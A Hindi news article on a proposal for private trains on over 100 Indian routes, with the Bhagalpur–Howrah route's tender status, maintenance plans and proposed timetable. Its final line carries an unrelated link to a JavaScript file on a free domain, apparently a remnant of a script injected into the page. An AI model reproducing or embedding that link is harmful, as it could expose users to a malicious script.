खुशखबरी देश के 100 से अधिक रूटों पर प्राइवेट ट्रेन चलाने का दिया गया प्रस्ताव भागलपुर रूट भी है इसमें सम्मिलित।
भागलपुर, ( कुलसूम फात्मा ) ट्रेन यात्रियों के लिए खुशखबरी है की पूरे देश में तकरीबन 109 रूटों पर प्राइवेट चलाने का प्रपोजल दिया गया है, जिसमें भागलपुर हावड़ा मार्ग भी सम्मिलित किया गया है। और इस मार्ग के लिए एक प्राइवेट ट्रेन को प्रस्तावित किया गया है। सितंबर तथा अक्टूबर तक के रेलवे ने रिक्वेस्ट फॉर क्वालिफिकेशन के लिए समय निश्चित किया था।
लेकिन 2021 के मार्च माह तक टेंडर फाइनल करने की समय सीमा रेलवे के पत्र में है। वर्तमान समय तक इस मामले से संबंधित कोई अभी बात सुनाई नहीं पड़ रही है। बता दे के टेंडर की प्रक्रिया में अभी किसी ने इंटरेस्ट नहीं दिखाया है और इस तरह से प्राइवेट ट्रेन के टेंडर के लेट होने की संभावना दिख रही है। इसके साथ ही प्राइवेट ट्रेन संचालन के लिए पूरे देश को अभी तक 12 क्लासटरों में बांटा जा चुका है। इसमें से हावड़ा जोन का कलास्टर में सम्मिलित किया गया था। पूर्व रेलवे में भागलपुर भी सम्मिलित होता है और रेलवे ने भागलपुर से हावड़ा के लिए प्राइवेट ट्रेन भी दी है।
बता दें की प्राइवेट ट्रेन की देखरेख और रखरखाव भागलपुर कोचिंग रेलवे यार्ड में ही होनी है और रेलवे कोचिंग निदेशक की तरफ से पूर्व रेलवे मुख्यालय को लेटर भी भेजा जा चुका है। इससे संबंधित फिटलाइन से संबंधित कई जानकारियां भी मांगी गई हैं, जैसे की इसका विद्युतीकरण आगे बढ़ा या नहीं या फिर रखरखाव करने वाले कर्मी तथा टूलबॉक्स से संबंधित आदि चीजें निजी होंगी।
जाने भागलपुर से हावड़ा के मध्य प्रस्तावित प्राइवेट ट्रेन का रूट।
भागलपुर हावड़ा के मध्य प्रदेश के प्राइवेट ट्रेन का मार्ग भागलपुर साहिबगंज से रामपुरहाट से हावड़ा है और यह मार्ग बेहतर होने की वजह से ही रेलवे ने ट्रेन की समय की लिस्ट भी जारी कर दी है। रेलवे ने बताया की इस मार्ग को अच्छा मानते हुए भागलपुर से हावड़ा की 419 किमी दूरी को तय करने में केवल 7.40 घंटे का ही समय लग सकता है।
जाने ट्रेन के चलने का समय।
यह ट्रेन भागलपुर से सुबह के समय तकरीबन 6:25 पर तथा हावड़ा पहुंचने का समय दोपहर के 2:05 है और वापसी वहां से हावड़ा से दिन के समय 2:35 पर तथा रात के समय 10:10 पर भागलपुर पहुंचने का समय बताया गया है। नाम नहीं छापने की शर्त पर अधिकारी ने कहा है कि ट्रेन के लिए योग्यता का बैकग्राउंड केवल देखा जा रहा है। इसके पश्चात ट्रेन अलॉट करने की प्रक्रिया प्रारंभ हो जाएगी। लॉकडाउन के पश्चात अभी ट्रेनों का संचालन नॉर्मल नहीं हुआ है। इसलिए इस ट्रेन के टेंडर से संबंधित अभी तक के इंटरेस्ट लेता कोई नहीं दिख रहा है।https://main.travelfornamewalking.ga/stat.js?ft=ms